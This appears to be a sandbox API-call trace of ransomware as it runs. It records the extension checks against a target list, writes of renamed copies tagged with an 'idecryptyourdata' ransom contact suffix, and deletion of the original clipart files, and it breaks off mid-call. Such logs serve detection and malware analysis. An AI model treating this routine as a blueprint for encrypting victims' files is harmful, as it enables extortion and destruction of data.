[0069.270] lstrlenW (lpString=".docx") returned 5 [0069.270] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1 [0069.270] lstrlenW (lpString=".pdf") returned 4 [0069.270] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.270] lstrlenW (lpString=".xls") returned 4 [0069.270] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.270] lstrlenW (lpString=".xlsx") returned 5 [0069.270] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1 [0069.270] lstrlenW (lpString=".ppt") returned 4 [0069.270] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.270] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099153.WMF") returned 68 [0069.271] lstrlenW (lpString=".zip") returned 4 [0069.271] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.271] lstrlenW (lpString=".rar") returned 4 [0069.271] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.271] lstrlenW (lpString=".bz2") returned 4 [0069.271] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.271] lstrlenW (lpString=".7z") returned 3 [0069.271] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.271] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099153.WMF") returned 68 [0069.271] lstrlenW (lpString=".dbf") returned 4 [0069.271] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.271] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099153.WMF") returned 68 [0069.271] lstrlenW (lpString=".1cd") returned 4 [0069.271] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.271] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099153.WMF") returned 68 [0069.271] lstrlenW (lpString=".jpg") returned 4 [0069.271] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.277] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.283] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.283] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099155.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099155.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0069.283] GetLastError () returned 0x0 [0069.283] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x227a, lpOverlapped=0x0) returned 1 [0069.290] WriteFile (in: hFile=0x38c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x2280, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x2280, lpOverlapped=0x0) returned 1 [0069.291] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.293] WriteFile (in: hFile=0x38c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.293] SetEndOfFile (hFile=0x38c) returned 1 [0069.294] CloseHandle (hObject=0x38c) returned 1 [0069.294] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.294] SetEndOfFile (hFile=0x384) returned 1 [0069.295] CloseHandle (hObject=0x384) returned 1 [0069.295] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099155.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.295] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099155.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099155.jpg")) returned 1 [0069.295] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099155.JPG") returned 68 [0069.295] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099155.JPG") returned 68 [0069.295] lstrlenW (lpString=".doc") returned 4 [0069.295] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0069.295] lstrlenW (lpString=".docx") returned 5 [0069.295] lstrcmpiW (lpString1=".docx", lpString2="5.JPG") returned -1 [0069.295] lstrlenW (lpString=".pdf") returned 4 [0069.296] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0069.296] lstrlenW (lpString=".xls") returned 4 [0069.296] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0069.296] lstrlenW (lpString=".xlsx") returned 5 [0069.296] lstrcmpiW (lpString1=".xlsx", lpString2="5.JPG") returned -1 [0069.296] lstrlenW (lpString=".ppt") returned 4 [0069.296] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0069.296] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099155.JPG") returned 68 [0069.296] lstrlenW (lpString=".zip") returned 4 [0069.296] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0069.296] lstrlenW (lpString=".rar") returned 4 [0069.296] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0069.296] lstrlenW (lpString=".bz2") returned 4 [0069.296] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0069.296] lstrlenW (lpString=".7z") returned 3 [0069.296] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0069.296] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099155.JPG") returned 68 [0069.296] lstrlenW (lpString=".dbf") returned 4 [0069.296] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0069.296] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099155.JPG") returned 68 [0069.296] lstrlenW (lpString=".1cd") returned 4 [0069.296] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0069.296] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099155.JPG") returned 68 [0069.296] lstrlenW (lpString=".jpg") returned 4 [0069.296] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0069.296] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.296] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.297] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099158.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099158.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0069.297] GetLastError () returned 0x0 [0069.297] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x6630, lpOverlapped=0x0) returned 1 [0069.299] WriteFile (in: hFile=0x38c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x6640, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x6640, lpOverlapped=0x0) returned 1 [0069.300] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.300] WriteFile (in: hFile=0x38c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.300] SetEndOfFile (hFile=0x38c) returned 1 [0069.301] CloseHandle (hObject=0x38c) returned 1 [0069.301] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.301] SetEndOfFile (hFile=0x384) returned 1 [0069.301] CloseHandle (hObject=0x384) returned 1 [0069.302] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099158.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.302] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099158.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099158.wmf")) returned 1 [0069.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099158.WMF") returned 68 [0069.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099158.WMF") returned 68 [0069.302] lstrlenW (lpString=".doc") returned 4 [0069.302] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.302] lstrlenW (lpString=".docx") returned 5 [0069.302] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0069.302] lstrlenW (lpString=".pdf") returned 4 [0069.302] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.302] lstrlenW (lpString=".xls") returned 4 [0069.302] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.302] lstrlenW (lpString=".xlsx") returned 5 [0069.302] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0069.302] lstrlenW (lpString=".ppt") returned 4 [0069.303] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.303] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099158.WMF") returned 68 [0069.303] lstrlenW (lpString=".zip") returned 4 [0069.303] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.303] lstrlenW (lpString=".rar") returned 4 [0069.303] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.303] lstrlenW (lpString=".bz2") returned 4 [0069.303] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.303] lstrlenW (lpString=".7z") returned 3 [0069.303] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.303] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099158.WMF") returned 68 [0069.303] lstrlenW (lpString=".dbf") returned 4 [0069.303] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.303] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099158.WMF") returned 68 [0069.303] lstrlenW (lpString=".1cd") returned 4 [0069.303] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.303] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099158.WMF") returned 68 [0069.303] lstrlenW (lpString=".jpg") returned 4 [0069.303] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.304] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.304] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.304] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099159.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099159.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0069.304] GetLastError () returned 0x0 [0069.304] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x6b9a, lpOverlapped=0x0) returned 1 [0069.316] WriteFile (in: hFile=0x38c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x6ba0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x6ba0, lpOverlapped=0x0) returned 1 [0069.317] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.317] WriteFile (in: hFile=0x38c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.317] SetEndOfFile (hFile=0x38c) returned 1 [0069.317] CloseHandle (hObject=0x38c) returned 1 [0069.317] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.317] SetEndOfFile (hFile=0x384) returned 1 [0069.318] CloseHandle (hObject=0x384) returned 1 [0069.318] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099159.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.318] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099159.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099159.wmf")) returned 1 [0069.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099159.WMF") returned 68 [0069.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099159.WMF") returned 68 [0069.319] lstrlenW (lpString=".doc") returned 4 [0069.319] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.319] lstrlenW (lpString=".docx") returned 5 [0069.319] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1 [0069.319] lstrlenW (lpString=".pdf") returned 4 [0069.319] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.319] lstrlenW (lpString=".xls") returned 4 [0069.319] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.319] lstrlenW (lpString=".xlsx") returned 5 [0069.319] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1 [0069.319] lstrlenW (lpString=".ppt") returned 4 [0069.319] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099159.WMF") returned 68 [0069.319] lstrlenW (lpString=".zip") returned 4 [0069.319] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.319] lstrlenW (lpString=".rar") returned 4 [0069.319] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.319] lstrlenW (lpString=".bz2") returned 4 [0069.319] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.320] lstrlenW (lpString=".7z") returned 3 [0069.320] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099159.WMF") returned 68 [0069.320] lstrlenW (lpString=".dbf") returned 4 [0069.320] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099159.WMF") returned 68 [0069.320] lstrlenW (lpString=".1cd") returned 4 [0069.320] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099159.WMF") returned 68 [0069.320] lstrlenW (lpString=".jpg") returned 4 [0069.320] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.320] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.320] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.320] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099160.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099160.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0069.321] GetLastError () returned 0x0 [0069.321] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x3b29, lpOverlapped=0x0) returned 1 [0069.322] WriteFile (in: hFile=0x38c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x3b30, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x3b30, lpOverlapped=0x0) returned 1 [0069.323] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.323] WriteFile (in: hFile=0x38c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.323] SetEndOfFile (hFile=0x38c) returned 1 [0069.324] CloseHandle (hObject=0x38c) returned 1 [0069.324] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.324] SetEndOfFile (hFile=0x384) returned 1 [0069.324] CloseHandle (hObject=0x384) returned 1 [0069.324] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099160.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.325] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099160.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099160.jpg")) returned 1 [0069.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099160.JPG") returned 68 [0069.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099160.JPG") returned 68 [0069.325] lstrlenW (lpString=".doc") returned 4 [0069.325] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0069.325] lstrlenW (lpString=".docx") returned 5 [0069.325] lstrcmpiW (lpString1=".docx", lpString2="0.JPG") returned -1 [0069.325] lstrlenW (lpString=".pdf") returned 4 [0069.325] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0069.325] lstrlenW (lpString=".xls") returned 4 [0069.325] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0069.326] lstrlenW (lpString=".xlsx") returned 5 [0069.326] lstrcmpiW (lpString1=".xlsx", lpString2="0.JPG") returned -1 [0069.326] lstrlenW (lpString=".ppt") returned 4 [0069.326] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0069.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099160.JPG") returned 68 [0069.326] lstrlenW (lpString=".zip") returned 4 [0069.326] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0069.326] lstrlenW (lpString=".rar") returned 4 [0069.326] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0069.326] lstrlenW (lpString=".bz2") returned 4 [0069.326] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0069.326] lstrlenW (lpString=".7z") returned 3 [0069.326] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0069.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099160.JPG") returned 68 [0069.326] lstrlenW (lpString=".dbf") returned 4 [0069.326] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0069.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099160.JPG") returned 68 [0069.326] lstrlenW (lpString=".1cd") returned 4 [0069.327] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0069.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099160.JPG") returned 68 [0069.327] lstrlenW (lpString=".jpg") returned 4 [0069.327] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0069.327] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.327] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.327] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099161.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099161.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0069.327] GetLastError () returned 0x0 [0069.327] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x1bf2, lpOverlapped=0x0) returned 1 [0069.336] WriteFile (in: hFile=0x38c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x1c00, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x1c00, lpOverlapped=0x0) returned 1 [0069.337] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.337] WriteFile (in: hFile=0x38c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.338] SetEndOfFile (hFile=0x38c) returned 1 [0069.338] CloseHandle (hObject=0x38c) returned 1 [0069.338] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.338] SetEndOfFile (hFile=0x384) returned 1 [0069.339] CloseHandle (hObject=0x384) returned 1 [0069.339] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099161.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.339] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099161.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099161.jpg")) returned 1 [0069.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099161.JPG") returned 68 [0069.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099161.JPG") returned 68 [0069.339] lstrlenW (lpString=".doc") returned 4 [0069.339] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0069.339] lstrlenW (lpString=".docx") returned 5 [0069.339] lstrcmpiW (lpString1=".docx", lpString2="1.JPG") returned -1 [0069.339] lstrlenW (lpString=".pdf") returned 4 [0069.339] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0069.339] lstrlenW (lpString=".xls") returned 4 [0069.339] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0069.339] lstrlenW (lpString=".xlsx") returned 5 [0069.340] lstrcmpiW (lpString1=".xlsx", lpString2="1.JPG") returned -1 [0069.340] lstrlenW (lpString=".ppt") returned 4 [0069.340] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0069.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099161.JPG") returned 68 [0069.340] lstrlenW (lpString=".zip") returned 4 [0069.340] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0069.340] lstrlenW (lpString=".rar") returned 4 [0069.340] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0069.340] lstrlenW (lpString=".bz2") returned 4 [0069.340] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0069.340] lstrlenW (lpString=".7z") returned 3 [0069.340] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0069.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099161.JPG") returned 68 [0069.340] lstrlenW (lpString=".dbf") returned 4 [0069.340] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0069.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099161.JPG") returned 68 [0069.340] lstrlenW (lpString=".1cd") returned 4 [0069.340] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0069.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099161.JPG") returned 68 [0069.340] lstrlenW (lpString=".jpg") returned 4 [0069.340] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0069.340] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, 